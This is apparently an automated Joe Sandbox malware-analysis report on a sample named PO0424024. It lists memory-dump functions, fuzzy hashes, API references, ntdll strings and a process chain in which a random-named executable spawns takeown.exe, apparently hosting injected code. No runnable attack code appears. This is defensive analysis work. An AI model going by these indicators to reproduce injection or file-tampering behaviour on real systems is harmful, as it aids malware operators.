Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
Instruction ID: 0d7f75ad45be9b499b1514e0083b1f219b7ad470c207000f1853693870aebfdc
Opcode Fuzzy Hash: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
Instruction Fuzzy Hash: 8D90022130140412D20271598814646000DC7D1385F95C023E1425595E8A298A53F932

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
Instruction ID: a3f5f175dc953f226a751161c0bc6929de810481188910883c29e6d3e6f692bf
Opcode Fuzzy Hash: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
Instruction Fuzzy Hash: 03900221211C0052D30075698C14B47000D87D0343F55C126A0155594DCD198962AD21

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
Instruction ID: 9b3a390038f3b97a0f922e78a8311a8692b3e8ebf25e05a264ba4de482bb5316
Opcode Fuzzy Hash: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
Instruction Fuzzy Hash: 129002216014005242407169CC44946400DABE1351755C132A0999590E895D8966AE65

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
Instruction ID: 0fb0b2837b44dbeecad21fde48569d0c1e18a655cb8a7f054254cdf80f8bbdba
Opcode Fuzzy Hash: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
Instruction Fuzzy Hash: 1A90023120180412D20071598C08787000D87D0342F55C022A5165595F8A69C992BD31

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
Instruction ID: 887a1f407d9db5bf11e5e139546073e63f3776fe66696f8aa186f14c332347a2
Opcode Fuzzy Hash: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
Instruction Fuzzy Hash: F390023120180412D20071598C1474B000D87D0342F55C022A1165595E8A298952BD71

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
Instruction ID: 657ed43ca1a61185b360c4b11954b8883195dfd9ca8b07feef61e04b9b85620f
Opcode Fuzzy Hash: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
Instruction Fuzzy Hash: EB90026121140052D20471598804746004D87E1341F55C023A2155594DC92D8D62A925

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
Instruction ID: 2bfe9e62c3087893bed50c4e1b9921ad277aac15ca5935519d4a37fbe67f546d
Opcode Fuzzy Hash: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
Instruction Fuzzy Hash: 4490026134140452D20071598814B46000DC7E1341F55C026E1065594E8A1DCD53B926

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 9602f96c20a6d2849ca0a13a3a99dca8b55b73f4fcdf5f3fab07aaab70d2c151
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00FA293C
___swprintf_l.LIBCMT ref: 00FA295E
___swprintf_l.LIBCMT ref: 00FA29A3
___swprintf_l.LIBCMT ref: 00FDA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 00FDA54E
::%hs%u.%u.%u.%u, xrefs: 00FDA527
:%u.%u.%u.%u, xrefs: 00FDA5B8
ffff:, xrefs: 00FDA504

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8594d3d2a52cefed07596ce85f0401421b78aca9bfac303cd30d770e81d52885
Instruction ID: 1cd9c4e4cfdb3e88417120171004d16073f327883b2aeacef006c4d481ec5a67
Opcode Fuzzy Hash: 8594d3d2a52cefed07596ce85f0401421b78aca9bfac303cd30d770e81d52885
Instruction Fuzzy Hash: 7351E4F2F00116AECB50DB9CC980A7FF7B8BB09740B14822AE465D7641D638DE44BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 00FD46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FD4725
Execute=1, xrefs: 00FD4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FD4655
CLIENT(ntdll): Processing section info %ws..., xrefs: 00FD4787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FD46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FD4742

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: ab97d4c6c94f7a01421202db1b15c9ff36be23593bfec874b89ab8b0214d7fd4
Instruction ID: a689f2348019e631bbcbb7b0cc9dd7603a268c2102e1fda78404c12e28d513cc
Opcode Fuzzy Hash: ab97d4c6c94f7a01421202db1b15c9ff36be23593bfec874b89ab8b0214d7fd4
Instruction Fuzzy Hash: 8D514931A043197BEF20BFA4DC86FEE77A8AF44310F1400A9E605A7191E771AE45EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00FAB6BF

Strings

0, xrefs: 00FAB695
+, xrefs: 00FAB65A
-, xrefs: 00FAB650
0, xrefs: 00FAB66F

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 73e290a40378be5447d71d64f0b9dbc911f088fb043a8606f1571a76f639ac16
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 028191B0E052499EDF24CF68C8517FEBBB5AF87320F184259E861A7393C7749841EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FD7B7F
RTL: Resource at %p, xrefs: 00FD7B8E
RTL: Re-Waiting, xrefs: 00FD7BAC

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 9e1485050e3951eb234f46f6f013fc3972694fe1b56c75c4bd79e4d0d4d054d1
Instruction ID: 3553ca676f17e3016472719a22156549a965037eb54f4347aab465c372093e15
Opcode Fuzzy Hash: 9e1485050e3951eb234f46f6f013fc3972694fe1b56c75c4bd79e4d0d4d054d1
Instruction Fuzzy Hash: 644116317047029FDB20DE25DD41B6AB7E5EF88724F100A1EF956DB380DB71E805AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FD7294
RTL: Resource at %p, xrefs: 00FD72A3
RTL: Re-Waiting, xrefs: 00FD72C1

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1d7d56d38a81bdc978e2104bf8a1b2414e87588921796fff123b6ebe4d14abdc
Instruction ID: d87ce0fd6a6ef30ad8f8114c3573e0ccc708aac0281be7251dbb8eebee7f509e
Opcode Fuzzy Hash: 1d7d56d38a81bdc978e2104bf8a1b2414e87588921796fff123b6ebe4d14abdc
Instruction Fuzzy Hash: FE410731B04352ABDB21EE25CC42B6AB7A5FF84721F140619F955DB381EB21E806BBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00FA7E8B

Strings

-, xrefs: 00FA7DDD
+, xrefs: 00FA7DE8

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: b153eeff31029cae7041e2ac3ae373f58d318e6d34dd55b0a1302ec4c147c388
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: E891B4F1E083059EDF24EF69CC81EBEB7A5AF46330F24451AE855A72C0D7749E41A760

Uniqueness

Uniqueness Score: -1.00%

Function 00F69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 00F69191
@, xrefs: 00F69175

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1e1c5eb65dde115b9f938869ee713bd682fc9949ec0657d1945245c7faecbf20
Instruction ID: 44f0010227c5e16b3cdd7fa9a28ba8308bd629b87d73867827e808774fd8a774
Opcode Fuzzy Hash: 1e1c5eb65dde115b9f938869ee713bd682fc9949ec0657d1945245c7faecbf20
Instruction Fuzzy Hash: 0E814C71D002699BDB31CB54CD45BEEB7B8EF48710F1041EAA909B7280E7745E84EFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tAFcdstzdUTfkmQlByDmlLl.exePID: 2412, Parent PID: 6776COMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 086BD883 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(?), ref: 086BD8B8

Memory Dump Source

Source File: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, Offset: 08660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8660000_tAFcdstzdUTfkmQlByDmlLl.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 2a2a5d4cc18a5087a74e7da958f394a3f23c520cc85226df92e867c2e94f2100
Instruction ID: 30d0f89257c7c08ce4f0d545f3af8e61f8f68afaaa33e2e4c17ffca13c8d4c2c
Opcode Fuzzy Hash: 2a2a5d4cc18a5087a74e7da958f394a3f23c520cc85226df92e867c2e94f2100
Instruction Fuzzy Hash: C5E08C3A200704BBCA11EB9ADC01DDBB3ACDFC9221F01801DFA18A7200CA71BA1487F5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: takeown.exePID: 1440, Parent PID: 2412COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.6%
Total number of Nodes:	442
Total number of Limit Nodes:	70

Executed Functions

Function 02F1BAC0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 02F1BBA4
FindNextFileW.KERNELBASE(?,00000010), ref: 02F1BBDF
FindClose.KERNELBASE(?), ref: 02F1BBEA

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: c927c7041102adcda67a8ab029b4bab782eeb431d01b833dadfeb524d748aec7
Instruction ID: 9a4c42c623a489fd606a08430c11cb407626b91795852433b400d204936a487a
Opcode Fuzzy Hash: c927c7041102adcda67a8ab029b4bab782eeb431d01b833dadfeb524d748aec7
Instruction Fuzzy Hash: F631907190020CBBDB60DB64CC85FEF777CEF55788F504558FA08A7194DBB4AA848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F27970 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F27A60

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d234b6aca245aad8eff6f70337dc1bdb9caa95836f43e374ce2c99a0cc4d41b
Instruction ID: e1e9c77a15ac9aff91160659f03ccae969fd9f3455d49345d703a22ae5c523ba
Opcode Fuzzy Hash: 9d234b6aca245aad8eff6f70337dc1bdb9caa95836f43e374ce2c99a0cc4d41b
Instruction Fuzzy Hash: 3531DFB5A01208ABCB14DF99D880EDFB7B9AF8C354F108209FA09A7240D770A9158FA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F27AD0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F27BA8

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0faf6a1543777b9159769b3b52369ead6480d26b71efc19fcaf9a87c85d44904
Instruction ID: 9b497051196749b422380ab4d31dd4bbd79798ad920cfeb51e9f4ce1d4d98c81
Opcode Fuzzy Hash: 0faf6a1543777b9159769b3b52369ead6480d26b71efc19fcaf9a87c85d44904
Instruction Fuzzy Hash: A931F7B5A00208AFCB14DF99DC80EEFB7B9EF89354F108209F909A7244D770A9118FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F27DA0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(02F1162E,?,02F26A07,00000000,00000004,00003000,?,?,?,?,?,02F26A07,02F1162E,02F29A8E,02F26A07,51F84D8D), ref: 02F27E5D

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3e1fabda3048be003f499ecec00da722f58517c1e7c43a44774aeff407354a47
Instruction ID: 140c91d61163d24ea233a4272eb31edcfb77af8d14820285af1f099c71f263f2
Opcode Fuzzy Hash: 3e1fabda3048be003f499ecec00da722f58517c1e7c43a44774aeff407354a47
Instruction Fuzzy Hash: 36213DB5A00218ABD710DF98DC40FAFB7A9EF89350F108209FE1997240D770A9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F27BB0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 02F27C3B

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 94e0ea33bbb342fe1b654188e61af7cc698cd6632349d4505271b8ebf0ebed06
Instruction ID: 18c767f5880fabbf957c1127af345b66634be70b6c01a4d8528832ae0965ad6f
Opcode Fuzzy Hash: 94e0ea33bbb342fe1b654188e61af7cc698cd6632349d4505271b8ebf0ebed06
Instruction Fuzzy Hash: 4E018475A412187BD710EBA8CC41FEBB3ADEB86750F504509FB099B184DBB079148BE5

Uniqueness

Uniqueness Score: -1.00%

Function 02F27C50 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F27C84

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction ID: 0c3572b6b0561b04d06fe5f01d8e75fcff48336675df2448af80d6ea56f671ab
Opcode Fuzzy Hash: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction Fuzzy Hash: 70E04F352412147BC210AA59DC40F9BB75DDFC57A4F504415FB08A7141C67179158AF4

Uniqueness

Uniqueness Score: -1.00%

Function 03784340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0378434A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 916178bc38445141170dc902cb6f4f58efed0c5bae4946d579adf64b1311657a
Instruction ID: d86a54d0d04b65ab0740708b001c3c5cf856cbe7e0124c7070b5fff00aa9dd92
Opcode Fuzzy Hash: 916178bc38445141170dc902cb6f4f58efed0c5bae4946d579adf64b1311657a
Instruction Fuzzy Hash: 5890023160580422B540B15858C45464005D7E1301B55C122E0428564C8B148A565366

Uniqueness

Uniqueness Score: -1.00%

Function 03784650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0378465A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79377dca0691c6dd2a94bdcf9be3d7253292a69c9a5597f70bc116c53aec8e90
Instruction ID: 5aa4af2b71c528245d96b772fffdc5d09a529efc236d727f98a0eac06cab229d
Opcode Fuzzy Hash: 79377dca0691c6dd2a94bdcf9be3d7253292a69c9a5597f70bc116c53aec8e90
Instruction Fuzzy Hash: E5900261601504526540B15858444066005D7E2301395C226A0558570C87188955926E

Uniqueness

Uniqueness Score: -1.00%

Function 03782B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782B6A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32b3e745ec32ef2a734bef931d01eec8360990c666c36f146732d6927ff56ce1
Instruction ID: 1b0aa27bd41b7b50a10ad202f4588f9477fa1322b4d4a01ac86570e483757f72
Opcode Fuzzy Hash: 32b3e745ec32ef2a734bef931d01eec8360990c666c36f146732d6927ff56ce1
Instruction Fuzzy Hash: C3900261202404136505B1585454616400AC7E1201B55C132E10185A0DC6258991612A

Uniqueness

Uniqueness Score: -1.00%

Function 03782BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782BFA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be7c4cf8fb499ef67a5592b47784d53f637ab16a132bb249ba864dd04bd2d1c6
Instruction ID: 82244d44498bf938c10bab5e28bda64b9f3321fdd3830a45019aada6f29b681f
Opcode Fuzzy Hash: be7c4cf8fb499ef67a5592b47784d53f637ab16a132bb249ba864dd04bd2d1c6
Instruction Fuzzy Hash: D090023120140C12F580B158544464A0005C7D2301F95C126A0029664DCB158B5977A6

Uniqueness

Uniqueness Score: -1.00%

Function 03782BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782BEA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59e774e32923430fb7727347e7d232b08b6145401c99c67f2a91443f764f24a4
Instruction ID: 48d9f31a8862a8e5eabeedcb808f9e21ba1777563cd838f69e81e78f629a27e1
Opcode Fuzzy Hash: 59e774e32923430fb7727347e7d232b08b6145401c99c67f2a91443f764f24a4
Instruction Fuzzy Hash: 4390023120544C52F540B1585444A460015C7D1305F55C122A00686A4D97258E55B666

Uniqueness

Uniqueness Score: -1.00%

Function 03782BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782BAA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

